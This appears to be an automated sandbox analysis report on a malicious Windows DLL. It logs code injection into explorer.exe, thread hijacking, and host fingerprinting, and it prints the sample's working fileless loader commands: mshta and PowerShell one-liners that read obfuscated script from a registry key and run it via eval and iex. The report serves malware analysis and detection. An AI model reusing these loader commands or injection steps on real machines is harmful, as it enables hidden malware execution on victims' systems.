Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: D70000 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 956000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2D60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 954000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2B60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2B50000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 942000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AC0000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93E000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 2BA0000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93C000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: D70000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 3360	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 3088	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 8DCB1580

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"

Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000002F.00000000.471103608.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.479070191.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.518388066.0000000000B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000002F.00000000.479497547.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000002F.00000000.492712624.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496673793.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_01C15F8B cpuid

1_2_01C15F8B

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

